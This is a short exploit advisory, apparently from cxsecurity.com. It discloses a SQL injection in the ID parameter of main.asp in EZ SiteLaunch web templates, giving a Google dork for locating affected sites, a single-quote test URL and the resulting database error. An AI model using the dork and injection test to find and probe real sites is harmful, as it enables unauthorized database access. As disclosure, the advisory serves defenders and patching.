EZ SiteLaunch SQL Injection

Published
Credit
Risk
2017.08.02
bRpsd
Medium
CWE
CVE
Local
Remote
N/A
N/A
No
Yes
Dork: Powered By EZ SiteLaunch LTD ext:asp

[-] Exploit Title: EZ SiteLaunch - SQL Injection
[-] Google Dork: Powered By EZ SiteLaunch LTD ext:asp
[-] Date: Augst 02, 2017
[-] Exploit Author: bRpsd ( skype: vegnox )
[-] Vendor Homepage: http://www.ezsitelaunch.com/
[-] Software Link: http://www.realestatewebtemplates.com/
[-] Versions: All 2003-2017 releases




Vulnerable File: main.asp
Parameter: ID

======
Test:
======
localhost/main.asp?id=1'



========
Returns:
========
Microsoft Access Database Engine error '80040e14'

Syntax error (missing operator) in query expression 'mainID = 1'''.

/main.asp, line 27


:D


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com